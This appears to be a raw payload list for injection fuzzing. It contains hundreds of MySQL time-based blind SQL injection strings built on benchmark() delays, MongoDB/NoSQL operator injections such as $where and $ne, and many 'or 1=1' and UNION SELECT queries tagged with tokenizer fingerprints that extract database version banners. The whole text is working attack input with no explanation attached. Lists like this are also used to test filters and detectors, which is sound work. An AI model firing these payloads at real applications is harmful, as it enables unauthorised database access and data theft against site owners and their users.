+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 and 0=benchmark(3000000,MD5(1))%20/*
 and 0=benchmark(3000000,MD5(1))%20--
 and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
&()o1: select * from users where id=1 or (\)=1 union select 1,@@VERSION -- 1
&(.)o: select * from users where id=1 or (\.)=1 union select 1,@@VERSION -- 1
&(1&1: select * from users where id=1 or (\+)=1 or 1=1 -- 1
&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1
&(1UE: select * from users where id=1 or (\+)=1 union select 1,@@VERSION -- 1
&(n&1: select * from users where id=1 or ($+)=1 or 1=1 -- 1
&(nUE: select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1
&.o&1: select * from users where id=1 or \.<\ or 1=1 -- 1
&.o1&: select * from users where id=1 or \.<1 or 1=1 -- 1
&.o1U: select * from users where id=1 or \.<1 union select 1,@@VERSION -- 1
&.oUE: select * from users where id=1 or \.<\ union select 1,@@VERSION -- 1
&.on&: select * from users where id=1 or \.<$ or 1=1 -- 1
&.onU: select * from users where id=1 or \.<$ union select 1,@@VERSION -- 1
&.oo1: select * from users where id=1 or \.< =1 union select 1,@@VERSION -- 1
&1UE1: select * from users where id=1 ||1 union select 1,banner from v$version where rownum=1 -- 1
&1UEv: select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1
&1c: select * from users where id=1   or 1=1 -- 1
&1oo&: select * from users where id=1 or \+<\ or 1=1 -- 1
&1oo1: select * from users where id=1 or  1<@=1 union select 1,version() -- 1
&1ooU: select * from users where id=1 or \+<\ union select 1,@@VERSION -- 1
&1oon: select * from users where id=1 or \+<$ union select 1,@@VERSION -- 1
&1ovc: select * from users where id=1 or 1&@#=1 union select 1,version() -- 1
&n.o1: select * from users where id=1 or $ .=1 union select 1,@@VERSION -- 1
&n1&1: select * from users where id=1 or $ 1=1 or 1=1 -- 1
&n1UE: select * from users where id=1 or $ 1=1 union select 1,@@VERSION -- 1
&no&1: select * from users where id=1 or $<\ or 1=1 -- 1
&no.&: select * from users where id=1 or $<\. or 1=1 -- 1
&no.U: select * from users where id=1 or $<\. union select 1,@@VERSION -- 1
&noUE: select * from users where id=1 or $<\ union select 1,@@VERSION -- 1
&noo&: select * from users where id=1 or $+<\ or 1=1 -- 1
&noo1: select * from users where id=1 or $+<1 union select 1,@@VERSION -- 1
&nooU: select * from users where id=1 or $+<\ union select 1,@@VERSION -- 1
&noon: select * from users where id=1 or $+<$ union select 1,@@VERSION -- 1
&o.&1: select * from users where id=1 or \<\. or 1=1 -- 1
&o.UE: select * from users where id=1 or \<\. union select 1,@@VERSION -- 1
&o1&1: select * from users where id=1 or \<1 or 1=1 -- 1
&o1UE: select * from users where id=1 or \<1 union select 1,@@VERSION -- 1
&oUE1: select * from users where id=1 or \<\ union select 1,@@VERSION -- 1
&oUEv: select * from users where id=1 or \<\ union select null,@@VERSION -- 1
&on&1: select * from users where id=1 or \<$ or 1=1 -- 1
&onUE: select * from users where id=1 or \<$ union select 1,@@VERSION -- 1
&oo1&: select * from users where id=1 or \< =1 or 1=1 -- 1
&oo1U: select * from users where id=1 or \< =1 union select 1,@@VERSION -- 1
&ov&1: select * from users where id=1 or !<@ or 1=1 -- 1
&ovUE: select * from users where id=1 or !<@ union select 1,version() -- 1
&v: select * from users where id=1 or @`\` union select 1,version() -- 1
&vc: select * from users where id=1 or  @$#=1 union select 1,version() -- 1
&voo1: select * from users where id=1 or @<@=1 union select 1,version() -- 1
)&1c: select * from users where id=1 +(\) or 1=1 -- 1
)UEvc: select * from users where id=1 +(\) union select null,@@VERSION -- 1
.&1UE: select * from users where id=1.&&1 union select 1,version() -- 1
.&1c: select * from users where id=1. or 1=1 -- 1
.&vUE: select * from users where id=1.&&@ union select 1,version() -- 1
.)&1c: select * from users where id=1 + (\.) or 1=1 -- 1
.)UEv: select * from users where id=1 + (\.) union select null,@@VERSION -- 1
.UE1,: select * from users where id=1.  union select 1,version() -- 1
.UE1k: select * from users where id=1. union select 1,banner from v$version where rownum=1 -- 1
.UEf(: select * from users where id=1.  union select version(),version() -- 1
.UEv,: select * from users where id=1. union select null,version() -- 1
.UEvc: select * from users where id=1 +\. union select null,@@VERSION -- 1
.UEvk: select * from users where id=1. union select null,banner from v$version where rownum=1 -- 1
.o&1c: select * from users where id=1. <@ or 1=1 -- 1
.o.&1: select * from users where id=1.<@. or 1=1 -- 1
.o.UE: select * from users where id=1.<@. union select 1,version() -- 1
.o1&1: select * from users where id=1.*1 or 1=1 -- 1
.o1UE: select * from users where id=1.*1 union select 1,banner from v$version where rownum=1 -- 1
.o1c: select * from users where id=1.<1# union select 1,version() -- 1
.oUE1: select * from users where id=1. <@ union select 1,version() -- 1
.oUEf: select * from users where id=1. <@ union select version(),version() -- 1
.oUEv: select * from users where id=1.*\ union select null,@@VERSION -- 1
.on&1: select * from users where id=1.<@$ or 1=1 -- 1
.onUE: select * from users where id=1.<@$ union select 1,version() -- 1
.ov&1: select * from users where id=1.%@ or 1=1 -- 1
.ovUE: select * from users where id=1.%@ union select 1,version() -- 1
1&1UE: select * from users where id=11||1 union select 1,banner from v$version where rownum=1 -- 1
1&1c: select * from users where id=1 +1 or 1=1 -- 1
1)&1c: select * from users where id=1 +(1) or 1=1 -- 1
1)UE1: select * from users where id=1 +(1) union select 1,banner from v$version where rownum=1 -- 1
1)UEv: select * from users where id=1 +(1) union select null,banner from v$version where rownum=1 -- 1
1UE1k: select * from users where id=1 +1 union select 1,banner from v$version where rownum=1 -- 1
1UEvk: select * from users where id=1 +1 union select null,banner from v$version where rownum=1 -- 1
1c: select * from users where id=11<1# union select 1,version() -- 1
1o)&1: select * from users where id=1 + (\+) or 1=1 -- 1
1o)UE: select * from users where id=1 + (\+) union select null,@@VERSION -- 1
1o.UE: select * from users where id=1 +\+. union select null,@@VERSION -- 1
1oUE1: select * from users where id=1 -1<@ union select 1,version() -- 1
1oUEf: select * from users where id=1 +1<@ union select version(),version() -- 1
1oUEv: select * from users where id=1 +1<@ union select null,version() -- 1
1oo&1: select * from users where id=1 + \+%\ or 1=1 -- 1
1oo1&: select * from users where id=1 + \+%1 or 1=1 -- 1
1oo1U: select * from users where id=1 + \+%1 union select null,@@VERSION -- 1
1ooUE: select * from users where id=1 + \+*\ union select null,@@VERSION -- 1
1oon&: select * from users where id=1 + \+%$ or 1=1 -- 1
1oonU: select * from users where id=1 + \+*$ union select null,@@VERSION -- 1
UE(1): select * from users where id=1 union select (1),banner from v$version where rownum=1 -- 1
UE1&1: select * from users where id=1 union select 1||1,version() -- 1
UE1&v: select * from users where id=1 union select 1||@,version() -- 1
UE111: select * from users where id=1 union select 1 1$,version() -- 1
UE11f: select * from users where id=1 union select 1 $,version() -- 1
UE11n: select * from users where id=1 union select 1 1a,version() -- 1
UE1f(: select * from users where id=1 union select 1<@$,version() -- 1
UE1kn: select * from users where id=1 union select 1,banner from v$version where rownum=1 -- 1
UE1n,: select * from users where id=1 union select .1_,version() -- 1
UE1n: select * from users where id=1 union select 1`\`,version() -- 1
UE1nc: select * from users where id=1 union select 1a#,banner from v$version where rownum=1 -- 1
UE1nk: select * from users where id=1 union select 1a,banner from v$version where rownum=1 -- 1
UE1nn: select * from users where id=1 union select .1$_,version() -- 1
UE1o,: select * from users where id=1 union select 1<@,version() -- 1
UE1o.: select * from users where id=1 union select 1<@.,version() -- 1
UE1s: select * from users where id=1 union select 1 $$,version() -- 1
UEo1,: select * from users where id=1 union select !<1,version() -- 1
UEoo1: select * from users where id=1 union select +!<1,version() -- 1
UEoov: select * from users where id=1 union select +!<@,version() -- 1
UEov,: select * from users where id=1 union select !<@,version() -- 1
UEv&1: select * from users where id=1 union select @||1,version() -- 1
UEv&v: select * from users where id=1 union select @&&@,version() -- 1
UEv11: select * from users where id=1 union select @ 1$,version() -- 1
UEv1f: select * from users where id=1 union select  @ $,version() -- 1
UEv1n: select * from users where id=1 union select @ 1a,version() -- 1
UEvf(: select * from users where id=1 union select @<@$,version() -- 1
UEvkn: select * from users where id=1   union select null,banner from v$version where rownum=1 -- 1
UEvn,: select * from users where id=1 union select @ _,version() -- 1
UEvnn: select * from users where id=1 union select @ $_,version() -- 1
UEvo,: select * from users where id=1 union select @<@,version() -- 1
UEvo.: select * from users where id=1 union select @<@.,version() -- 1
UEvs: select * from users where id=1 union select @ $$,version() -- 1
n.&1c: select * from users where id=1 +$ . or 1=1 -- 1
n.UEv: select * from users where id=1 +$ . union select null,@@VERSION -- 1
n1&1c: select * from users where id=1 +$ 1 or 1=1 -- 1
n1UEv: select * from users where id=1 +$ 1 union select null,@@VERSION -- 1
no&1c: select * from users where id=1 +$+ or 1=1 -- 1
no)&1: select * from users where id=1 + ($+) or 1=1 -- 1
no)UE: select * from users where id=1 + ($+) union select null,@@VERSION -- 1
no.&1: select * from users where id=1 +$+. or 1=1 -- 1
no.UE: select * from users where id=1 +$+. union select null,@@VERSION -- 1
noUEv: select * from users where id=1 +$+ union select null,@@VERSION -- 1
noo&1: select * from users where id=1 + $+%\ or 1=1 -- 1
noo1&: select * from users where id=1 + $+%1 or 1=1 -- 1
noo1U: select * from users where id=1 + $+%1 union select null,@@VERSION -- 1
nooUE: select * from users where id=1 + $+*\ union select null,@@VERSION -- 1
noon&: select * from users where id=1 + $+%$ or 1=1 -- 1
noonU: select * from users where id=1 + $+*$ union select null,@@VERSION -- 1
o&1c: select * from users where id=1 <@ or 1=1 -- 1
o()&1: select * from users where id=1 %(\) or 1=1 -- 1
o()UE: select * from users where id=1 *(\) union select null,@@VERSION -- 1
o(1)&: select * from users where id=1 %(1) or 1=1 -- 1
o(1)U: select * from users where id=1 *(1) union select 1,banner from v$version where rownum=1 -- 1
o(n)&: select * from users where id=1 %($) or 1=1 -- 1
o(v)&: select * from users where id=1 %(@) or 1=1 -- 1
o.&1c: select * from users where id=1 <@. or 1=1 -- 1
o..&1: select * from users where id=1 <@.. or 1=1 -- 1
o..UE: select * from users where id=1<@.. union select 1,version() -- 1
o.UE1: select * from users where id=1 <@. union select 1,version() -- 1
o.UEf: select * from users where id=1  <@. union select version(),version() -- 1
o.UEv: select * from users where id=1 *\. union select null,@@VERSION -- 1
o.n&1: select * from users where id=1 <@.$ or 1=1 -- 1
o.nUE: select * from users where id=1 <@.$ union select 1,version() -- 1
o1&1c: select * from users where id=1 *1 or 1=1 -- 1
o1UE1: select * from users where id=1 *1 union select 1,banner from v$version where rownum=1 -- 1
o1UEv: select * from users where id=1 *1 union select null,banner from v$version where rownum=1 -- 1
o1c: select * from users where id=1 <1## union select 1,version() -- 1
o1n&1: select * from users where id=1 <@1$ or 1=1 -- 1
o1nUE: select * from users where id=1 <@1$ union select 1,version() -- 1
oUEvc: select * from users where id=1 *\ union select null,@@VERSION -- 1
on&1c: select * from users where id=1 <@$ or 1=1 -- 1
on.&1: select * from users where id=1 %$ . or 1=1 -- 1
on.UE: select * from users where id=1 *$ . union select null,@@VERSION -- 1
on1&1: select * from users where id=1 %$ 1 or 1=1 -- 1
on1UE: select * from users where id=1 %$ 1 union select null,@@VERSION -- 1
onn&1: select * from users where id=1 <@$_ or 1=1 -- 1
onnUE: select * from users where id=1 <@$_ union select 1,version() -- 1
oo&1c: select * from users where id=1 <@<@ or 1=1 -- 1
oo1&1: select * from users where id=1 %!<1 or 1=1 -- 1
oo1UE: select * from users where id=1 | |1 union select 1,banner from v$version where rownum=1 -- 1
ooUE1: select * from users where id=1<@<@ union select 1,version() -- 1
ooUEf: select * from users where id=1 <@<@ union select version(),version() -- 1
ooUEv: select * from users where id=1 <@<@ union select null,version() -- 1
oov&1: select * from users where id=1 %!<@ or 1=1 -- 1
oovUE: select * from users where id=1 <@&@ union select 1,version() -- 1
os: select * from users where id=1 <@$$ union select 1,version() -- 1
ov&1c: select * from users where id=1 &@ or 1=1 -- 1
s&&o1: select * from users where id='1' or ||/1=1 union select 1,version() -- 1'
s&()o: select * from users where id='1' or (\)=1 union select 1,@@VERSION -- 1'
s&(.): select * from users where id='1' or (\.)=1 union select 1,@@VERSION -- 1'
s&(1): select * from users where id='1' or (1)=1 union select 1,banner from v$version where rownum=1 -- 1'
s&.o&: select * from users where id='1' or \.<\ or 1=1 -- 1'
s&.o1: select * from users where id='1' or \.<1 union select 1,@@VERSION -- 1'
s&.oU: select * from users where id='1' or \.<\ union select 1,@@VERSION -- 1'
s&.on: select * from users where id='1' or \.<$ union select 1,@@VERSION -- 1'
s&.oo: select * from users where id='1' or \.< =1 union select 1,@@VERSION -- 1'
s&1UE: select * from users where id='1' ||1 union select 1,banner from v$version where rownum=1 -- 1'
s&1c: select * from users where id='1'   or 1=1 -- 1'
s&1oo: select * from users where id='1' or 1^=1 union select 1,banner from v$version where rownum=1 -- 1'
s&n.o: select * from users where id='1' or $ .=1 union select 1,@@VERSION -- 1'
s&n1&: select * from users where id='1' or $ 1=1 or 1=1 -- 1'
s&n1U: select * from users where id='1' or $ 1=1 union select 1,@@VERSION -- 1'
s&no&: select * from users where id='1' or $<\ or 1=1 -- 1'
s&no.: select * from users where id='1' or $<\. union select 1,@@VERSION -- 1'
s&noU: select * from users where id='1' or $<\ union select 1,@@VERSION -- 1'
s&noo: select * from users where id='1' or $+<$ union select 1,@@VERSION -- 1'
s&o.&: select * from users where id='1' or \<\. or 1=1 -- 1'
s&o.U: select * from users where id='1' or \<\. union select 1,@@VERSION -- 1'
s&o1&: select * from users where id='1' or \<1 or 1=1 -- 1'
s&o1U: select * from users where id='1' or !<1 union select 1,version() -- 1'
s&oUE: select * from users where id='1' or \<\ union select 1,@@VERSION -- 1'
s&on&: select * from users where id='1' or \<$ or 1=1 -- 1'
s&onU: select * from users where id='1' or \<$ union select 1,@@VERSION -- 1'
s&oo1: select * from users where id='1' or \< =1 union select 1,@@VERSION -- 1'
s&ov&: select * from users where id='1' or !<@ or 1=1 -- 1'
s&ovU: select * from users where id='1' or !<@ union select 1,version() -- 1'
s&v(1: select * from users where id='1' or @(1)=1 union select 1,version() -- 1'
s&v1U: select * from users where id='1' or @ 1=1 union select 1,version() -- 1'
s&vvU: select * from users where id='1' or @ @1=1 union select 1,version() -- 1'
s()s: select * from users where id=1 or "()" or 1=1 -- 1
s(,s: select * from users where id=1 or "(,"=1 or 1=1 -- 1
s(.s: select * from users where id=1 or "(." or 1=1 -- 1
s(1s: select * from users where id=1 or "(1" or 1=1 -- 1
s(:s: select * from users where id=1 or "(:" or 1=1 -- 1
s(;s: select * from users where id=1 or "(;" or 1=1 -- 1
s(?s: select * from users where id=1 or "(]" or 1=1 -- 1
s(UE1: select * from users where id=1 or 1#"( union select 1,version() -- 1
s(UEf: select * from users where id=1 or 1#"( union select version(),version() -- 1
s(UEs: select * from users where id=1 or 1#"( union select 'a',version() -- 1
s(UEv: select * from users where id=1 or 1#"( union select null,version() -- 1
s(c: select * from users where id=1 or "(#" or 1=1 -- 1
s(n: select * from users where id=1 or "([" or 1=1 -- 1
s(ns: select * from users where id=1 or "(_" or 1=1 -- 1
s(o1&: select * from users where id=1 or @#"(=1 or 1=1 -- 1
s(o1U: select * from users where id=1 or @#"(=1 union select 1,version() -- 1
s(os: select * from users where id=1 or "(&" or 1=1 -- 1
s(v: select * from users where id=1 or "(@" or 1=1 -- 1
s({s: select * from users where id=1 or "({" or 1=1 -- 1
s)(s: select * from users where id=1 or ")("=1 or 1=1 -- 1
s),s: select * from users where id=1 or ")," or 1=1 -- 1
s).s: select * from users where id=1 or ")."=1 or 1=1 -- 1
s)1s: select * from users where id=1 or ")1" or 1=1 -- 1
s):s: select * from users where id=1 or "):" or 1=1 -- 1
s);s: select * from users where id=1 or ");" or 1=1 -- 1
s)?s: select * from users where id=1 or ")]" or 1=1 -- 1
s)n: select * from users where id=1 or ")[" or 1=1 -- 1
s)ns: select * from users where id=1 or ")$" or 1=1 -- 1
s)v: select * from users where id=1 or ")@" or 1=1 -- 1
s){s: select * from users where id=1 or "){" or 1=1 -- 1
s,(s: select * from users where id=1 or ",(" or 1=1 -- 1
s,)s: select * from users where id=1 or ",)"=1 or 1=1 -- 1
s,,s: select * from users where id=1 or ",,"=1 or 1=1 -- 1
s,.s: select * from users where id=1 or ",." or 1=1 -- 1
s,:s: select * from users where id=1 or ",:"=1 or 1=1 -- 1
s,;s: select * from users where id=1 or ",;" or 1=1 -- 1
s,?s: select * from users where id=1 or ",?" or 1=1 -- 1
s,UE1: select * from users where id=1 or 1#", union select 1,version() -- 1
s,UEf: select * from users where id=1 or 1#", union select version(),version() -- 1
s,UEs: select * from users where id=1 or 1#", union select 'a',version() -- 1
s,UEv: select * from users where id=1 or 1#", union select null,version() -- 1
s,c: select * from users where id=1 or ",#" or 1=1 -- 1
s,o1&: select * from users where id=1 or 1#",=1 or 1=1 -- 1
s,o1U: select * from users where id=1 or @#",=1 union select 1,version() -- 1
s,os: select * from users where id=1 or ",&" or 1=1 -- 1
s,{s: select * from users where id=1 or ",{" or 1=1 -- 1
s.(s: select * from users where id=1 or ".(" or 1=1 -- 1
s.)s: select * from users where id=1 or ".)" or 1=1 -- 1
s.,s: select * from users where id=1 or ".," or 1=1 -- 1
s..s: select * from users where id=1 or ".."=1 or 1=1 -- 1
s.:s: select * from users where id=1 or ".:"=1 or 1=1 -- 1
s.;s: select * from users where id=1 or ".;" or 1=1 -- 1
s.?s: select * from users where id=1 or ".]" or 1=1 -- 1
s.UE1: select * from users where id=1 or 1#". union select 1,version() -- 1
s.UEf: select * from users where id=1 or 1#". union select version(),version() -- 1
s.UEs: select * from users where id=1 or 1#". union select 'a',version() -- 1
s.UEv: select * from users where id=1 or 1#". union select null,version() -- 1
s.c: select * from users where id=1 or ".#" or 1=1 -- 1
